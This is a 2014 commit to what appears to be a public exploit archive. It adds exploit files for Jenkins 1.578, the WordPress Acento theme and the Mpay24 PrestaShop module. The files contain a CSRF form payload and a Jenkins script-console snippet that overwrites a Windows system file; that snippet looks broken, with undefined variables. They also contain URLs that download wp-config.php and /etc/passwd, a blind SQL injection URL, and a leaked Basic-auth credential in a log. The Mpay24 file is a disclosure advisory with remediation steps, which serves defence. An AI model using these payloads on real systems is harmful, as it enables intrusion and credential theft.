Updated 09_10_2014

2014-09-10 04:44:48 +00:00 · 2014-09-10 04:44:48 +00:00 · 38f34a5333
commit 38f34a5333
parent d0930d2156
5 changed files with 274 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -31136,3 +31136,6 @@ id,file,description,date,author,platform,type,port
 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 'nusoap.php' Cross Site Scripting Vulnerability",2010-09-03,"Bogdan Calin",php,webapps,0
 34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
 34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0
+34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme (view-pdf.php, file param) - Arbitrary File Download",2014-09-08,alieye,php,webapps,80
+34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80
+34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090
--- a/platforms/multiple/webapps/34587.txt
+++ b/platforms/multiple/webapps/34587.txt
@ -0,0 +1,56 @@
+#Affected Vendor: http://jenkins-ci.org/
+#Date: 03/09/2014
+#Discovered by: JoeV
+#Type of vulnerability: CSRF and Command Execution
+
+#Tested on: Windows 7
+#Version : 1.578
+
+#Description: Jenkins is susceptible to CSRF attack and command
+execution. Using groovy one can fire any command and get it executed
+by the script console thus able to access files, registry keys, values
+and folders which is outbound for Jenkins.
+
+
+#CSRF
+
+--------
+
+#Payload:
+
+<form method="POST" name="form0"
+action="http://localhost:8090/credential-store/createDomain">
+
+<input type="hidden" name="_.name" value="xyz"/>
+<input type="hidden" name="description" value="abc"/>
+<input type="hidden" name="json" value="{'name': 'xyz', 'description': 'abc'}"/>
+<input type="hidden" name="Submit" value="OK"/>
+</form>
+
+
+Command Execution (/script)
+-------------------------------------
+ArrayList pids = null
+PrintWriter writer = null
+
+File f = new File("C:/Windows/System32/Services.msc")
+
+if (f.length() > 0){
+   pids = new ArrayList()
+   f.eachLine { line -> pids.add(line) }
+   println("Item to be removed: " + pids.get(0))
+   testRunner.testCase.setPropertyValue( "personId", pid )
+   pids.remove(0)
+   println pids
+   writer = new PrintWriter(f)
+   pids.each { id -> writer.println(id) }
+   writer.close()
+}
+else{
+   println "Null"
+    }
+
+-- 
+Regards,
+
+*Joel V*
--- a/platforms/php/webapps/34552.txt
+++ b/platforms/php/webapps/34552.txt
@ -1,5 +1,7 @@
 Title:     LoadedCommerce7 Systemic Query Factory Vulnerability

+Advisory:  http://breaking.technology/advisories/CVE-2014-5140.txt
+
 Credits:   Discovered by Breaking Technology Research Labs 2014-06-30

 Reference: CVE-2014-5140 - Assigned 31 June 2014
--- a/platforms/php/webapps/34578.txt
+++ b/platforms/php/webapps/34578.txt
@ -0,0 +1,34 @@
+#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+# Title : WordPress acento theme Arbitrary File Download Vulnerability
+# Author : alieye
+# vondor : http://www.wpbyexample.com/detail/acentocultural.com
+# Contact : cseye_ut@yahoo.com
+# Risk : High
+# Class: Remote
+# Date: 01/09/2014
+#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+
+You can download any file from your target ;)
+
+
+exploit: http://victim.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
+
+
+Demo:
+
+1-download wp-config.php file from site:
+
+http://server/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/homepages/44/d398221315/htdocs/wp-config.php
+
+2-download passwd file from root:
+
+http://server/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/etc/passwd
+
+
+#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members
+[#] Thanks To All Iranian Hackers
+[#] website : http://cseye.vcp.ir/
+#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
--- a/platforms/php/webapps/34586.txt
+++ b/platforms/php/webapps/34586.txt
@ -0,0 +1,179 @@
+Mpay24 PrestaShop Payment Module Multiple Vulnerabilities
+
+   - ·         Affected Vendor: Mpay24
+   - ·         Affected Software: Mpay24 Payment Module
+   - ·         Affected Version: 1.5 and earlier
+   - ·         Issue Type: SQL injection and information disclosure
+   - ·         Notification Date: 10 February 2014
+   - ·         Release Date: 03 September 2014
+   - ·         Discovered by: Eldar Marcussen
+   - ·         Issue status: Patch available
+
+Summary
+
+BAE Systems Applied Intelligence researcher, Eldar Marcussen has identified
+two high impact vulnerabilities in the Mpay24 payment module for the
+Prestashop e-commerce solution.
+
+“Mpay24 is the online-payment platform for e- and m-commerce combines
+frequently used and innovative payment systems in one single interface”. [
+www.mpay24.com]
+
+“Prestashop is the free ecommerce solution to start your online business
+and start selling online. Build an online store for free with Prestashop.” [
+www.prestashop.com]
+Pre-Authentication Blind SQL Injection Requires
+
+Mpay24 payment module present on the website.
+CVE identifier
+
+CVE-2014-2008
+Description
+
+The Mpay24 plugin version 1.5 and earlier does not sufficiently filter or
+escape user supplied data used in database queries resulting in SQL
+injection vulnerabilities.
+
+The following blind SQL injection vulnerability is caused by user supplied
+data being used directly in a database query, as evidenced by the offending
+code:
+
+ confirm.php:12:    Db::getInstance()->Execute("
+
+confirm.php:13:            UPDATE `"._DB_PREFIX_."mpay24_order` SET
+
+confirm.php:14:                `MPAYTID` = ".$_REQUEST['MPAYTID'].",
+
+confirm.php:15:                `STATUS` = '".$_REQUEST['STATUS']."'
+
+confirm.php:16:                WHERE `TID` = '".$_REQUEST['TID']."'
+
+confirm.php:17:        ");
+Impact
+
+Using this vulnerability, BAE Systems was able to extract information
+directly from the database, bypassing any restrictions that may be enforced
+by the application.
+
+
+  Proof of Concept
+
+The following URL introduces an artificial delay in the page response time
+which can be used by an attacker to extract data from the database:
+
+
+http://target/path/modules/mpay24/confirm.php?MPAYTID=1&STATUS=bbb&TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+
+Recommendation
+
+Use prepared statements to ensure the structure of the database query
+remains intact.
+Pre-Authentication Information Disclosure Requires
+
+Mpay24 configured with debug enabled (default value until version 1.6).
+CVE identifier
+
+CVE-2014-2009
+Description
+
+The Mpay24 plugin logs raw curl requests and other debugging information to
+the payment gateway by default. This log file is publicly accessible and
+contains information valuable to an attacker, including the base64 encoded
+credentials used by the merchant to access the Mpay24 API.
+Impact
+
+Using this vulnerability, BAE Systems was able to obtain Mpay24 API
+credentials and the local path of the Prestashop installation. The attacker
+can use the API credentials to hijack the merchants API access and leverage
+the local path disclosure with other exploits.
+Proof of Concept
+
+URL: http://target/path/modulesmapy24/api/curllog.log
+
+ * About to connect() to test.mpay24.com port 443 (#0)
+
+*   Trying 213.164.23.169...
+
+* connected
+
+* Connected to test.mpay24.com (213.164.23.169) port 443 (#0)
+
+* successfully set certificate verify locations:
+
+*   CAfile: /var/www/prestashop/modules/mpay24/api/cacert.pem
+
+  CApath: /etc/ssl/certs
+
+* SSL connection using DHE-RSA-AES256-GCM-SHA384
+
+* Server certificate:
+
+*      subject: OU=Domain Control Validated; OU=Provided by EUNETIC GmbH;
+OU=EuropeanSSL Single; CN=test.mpay24.com
+
+*      start date: 2013-05-13 00:00:00 GMT
+
+*      expire date: 2015-05-13 23:59:59 GMT
+
+*      subjectAltName: test.mpay24.com matched
+
+*      issuer: C=DE; O=EUNETIC GmbH; CN=EuropeanSSL Server CA
+
+*      SSL certificate verify ok.
+
+* Server auth using Basic with user 'u91234'
+
+> POST /app/bin/etpproxy_v15 HTTP/1.1
+
+Authorization: Basic dTkxMjM0OlNPQVAxMjM=
+
+User-Agent: mPAY24 PHP API $Rev: 5522 $ ($Date:: 2013-06-24 #$)
+
+Host: test.mpay24.com
+
+Accept: */*
+
+Content-Length: 423
+
+Content-Type: application/x-www-form-urlencoded
+
+
+
+* upload completely sent off: 423 out of 423 bytes
+
+* additional stuff not fine transfer.c:1037: 0 0
+
+* HTTP 1.1 or later with persistent connection, pipelining supported
+
+< HTTP/1.1 401 Authorization Required
+
+< Date: Sun, 09 Feb 2014 21:04:21 GMT
+
+< Server: Apache
+
+* Authentication problem. Ignoring this.
+
+< WWW-Authenticate: Basic realm="mPAY24 WebService"
+
+< Content-Length: 401
+
+< Content-Type: text/html; charset=iso-8859-1
+
+<
+
+* Connection #0 to host test.mpay24.com left intact
+
+* Closing connection #0
+Recommendation
+
+Restrict access to webpages containing sensitive functionality or data to
+authenticated users.
+End User Recommendation
+
+Update your Mpay24 plugin to version 1.6 or later.
+Response Timeline
+
+   - 10/02/2014 – Vendor notified
+   - 13/02/2014 – Patch available through GitHub
+   - 19/02/2014 – CVE identifiers assigned
+
+03/09/2014 – Advisory released